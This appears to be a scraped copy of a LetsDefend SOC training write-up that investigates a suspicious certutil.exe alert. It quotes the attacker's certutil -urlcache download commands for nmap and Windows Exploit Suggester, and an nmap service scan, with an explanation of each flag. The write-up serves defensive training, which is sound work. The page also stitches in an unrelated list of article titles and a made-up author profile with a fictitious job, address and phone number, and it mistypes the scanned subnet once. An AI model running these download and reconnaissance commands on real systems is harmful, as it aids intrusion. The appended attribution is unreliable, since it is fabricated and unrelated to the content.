Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (2024)

LetsDefend is a platform for practical training for blue team members. You can improve your skills in log analysis, incident handling, malware analysis and endpoint analysis.

https://letsdefend.io

Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (2)

Today a suspicious Certutil.exe usage occured on a host. Certutil is used by threat actors to download files from an external system into a compromised environment.

The investigation start on the Monitoring Page (Figure 1) which simulates a real working Security Operation Center alerts panel. This console offers further details about the security event occuring.

In SOC163 — Suspicious Certutil.exe Usage case, useful host information will help us catch sight of the action taking place, using other tools at our disposal. Always consider the following data when investigating: Event Time, Hostname, IP Address, Related Binary, Binary Path, Command Line and EDR Action.

  • Event Time: March 1, 2022 11:06 A.M
  • Hostname: EricProd
  • IP Address: 172.16.17.22
  • Related Binary: certutil.exe
  • Binary Path: C:/Windows/System32/certutil.exe
  • Command Line: certutil.exe -urlcache -split -f hXXps://nmap[.]org/dist/nmap-7.92-win32.zip nmap.zip
  • EDR Action: Allowed
Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (3)

In SOC163 — Suspicious Certutil.exe Usage, the attacker executed a command running an executable named Certutil.

What is Certutil.exe ?

Certutil.exe is a command-line program, installed as part of Certificate Services. You can use it to dump and display certification authority (CA) configuration information, configure Certificate Services, backup and restore CA components, and verify certificates, key pairs, and certificate chains.

Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (4)

How hackers use Certutil.exe ?

  • Used to decode binaries hidden inside certificate files as Base64 information.
  • Used to download files from a given URL.
  • Used to install browser root certificates as a precursor to perform Adversary-in-the-Middle between connections to banking websites.
Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (5)

In SOC163 — Suspicious Certutil.exe Usage, the attacker used Certutil to download two files from the internet. The first running command was:

certutil.exe -urlcache -split -f hXXps://nmap[.]org/dist/nmap-7.92-win32.zip nmap.zip

  • -urlcache — Displays or deletes URL cache entries
  • -split — Embedded ASN.1 element and save it to a file
  • -f — Forces overwrite
  • hXXps://nmap[.]org/dist/nmap-7.92-win32.zip — URL
  • nmap.zip — Filename output

What is Nmap ?

Nmap allows you to scan your network and discover not only everything connected to it, but also a wide variety of information about what’s connected, what services each host is operating, and so on.

Why hackers use Nmap ?

  • List services running on remote/local host
  • Discover live host on network
  • Discover service vulnerabilities using scripting feature in nmap

In SOC163 — Suspicious Certutil.exe Usage, the attacker used Nmap to discover live host service and version on the network by running the following command :

nmap -sV 192.168.0.0/24 -p 80

  • -sV — Service and Version Detection
  • 192.169.0.0/24 — IP CIDR to scan
  • -p 80 — Port to scan

In SOC163 — Suspicious Certutil.exe Usage, the attacker used Certutil to download two files from the internet. The second running command Certutil instance was:

certutil.exe -urlcache -split -f hXXps://raw[.]githubusercontent[.]com/AonCyberLabs/Windows-Exploit-Suggester/master/windows-exploit-suggester.py check.py

What is Windows Exploit Suggester ?

This tool compares a target patch levels against the Microsoft vulnerability database in order to detect potential missing patches on the target. It also notifies the user if there are public exploits and Metasploit modules available for the missing bulletins.

Why hackers use Windows Exploit Suggester

The hackers use Windows Exploit Suggestor to gain higher-level permissions on the host system.

Let’s now verify these details on the Log Management and Endpoint Security page.

Using the Log Management panel, confirm the suspicious URLs were reached by host 172.16.17.22.

Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (6)
Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (7)
Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (8)

Refer the Command History (Figure 7), the Network Connections (Figure 8) and the Process List (Figure 9) on Endpoint Security page. It simulates a real working Endpoint Detection and Response (EDR) security tool.

As it has been pointed out, numerous suspicious attacker-based commands, network connections and processes list are observed.

Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (9)
Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (10)
Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (11)

Containment

Considering each and every information from our investigation, we are able to define the event as a true positive incident. Containment should be enforced.

Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (12)
  • Is the current activity suspicious? — Yes, suspicious
  • What is suspicious activity? —Downloading
  • Who performed the activity? — User
Lets Defend —Suspicious Certutil.exe Usage — EventID 113 (2024)
Top Articles
Get Free Credit Reports From All 3 Credit Bureaus - Experian
Types of Time Value of Money Notes for the UGC-NET Commerce Exam
Somboun Asian Market
Cold Air Intake - High-flow, Roto-mold Tube - TOYOTA TACOMA V6-4.0
Ffxiv Shelfeye Reaver
Craftsman M230 Lawn Mower Oil Change
Wisconsin Women's Volleyball Team Leaked Pictures
Cad Calls Meriden Ct
Wmu Course Offerings
Top Financial Advisors in the U.S.
Corpse Bride Soap2Day
Optum Medicare Support
Pbr Wisconsin Baseball
Espn Expert Picks Week 2
454 Cu In Liters
4156303136
Painting Jobs Craigslist
Kamzz Llc
EASYfelt Plafondeiland
Japanese Mushrooms: 10 Popular Varieties and Simple Recipes - Japan Travel Guide MATCHA
At&T Outage Today 2022 Map
Jordan Poyer Wiki
kvoa.com | News 4 Tucson
Cornedbeefapproved
Aes Salt Lake City Showdown
Stockton (California) – Travel guide at Wikivoyage
Kelley Fliehler Wikipedia
Willys Pickup For Sale Craigslist
County Cricket Championship, day one - scores, radio commentary & live text
Otis Offender Michigan
Stolen Touches Neva Altaj Read Online Free
Www Craigslist Com Shreveport Louisiana
How to Watch the X Trilogy Starring Mia Goth in Chronological Order
Seymour Johnson AFB | MilitaryINSTALLATIONS
Junee Warehouse | Imamother
Tds Wifi Outage
Elgin Il Building Department
Hindilinks4U Bollywood Action Movies
Ticket To Paradise Showtimes Near Marshall 6 Theatre
Pokemon Reborn Locations
Craigslist Tulsa Ok Farm And Garden
Cranston Sewer Tax
412Doctors
Timothy Warren Cobb Obituary
Professors Helpers Abbreviation
Dontrell Nelson - 2016 - Football - University of Memphis Athletics
Copd Active Learning Template
Bonecrusher Upgrade Rs3
The 13 best home gym equipment and machines of 2023
Kidcheck Login
Guidance | GreenStar™ 3 2630 Display
Latest Posts
Article information

Author: Kerri Lueilwitz

Last Updated:

Views: 6123

Rating: 4.7 / 5 (67 voted)

Reviews: 82% of readers found this page helpful

Author information

Name: Kerri Lueilwitz

Birthday: 1992-10-31

Address: Suite 878 3699 Chantelle Roads, Colebury, NC 68599

Phone: +6111989609516

Job: Chief Farming Manager

Hobby: Mycology, Stone skipping, Dowsing, Whittling, Taxidermy, Sand art, Roller skating

Introduction: My name is Kerri Lueilwitz, I am a courageous, gentle, quaint, thankful, outstanding, brave, vast person who loves writing and wants to share my knowledge and understanding with you.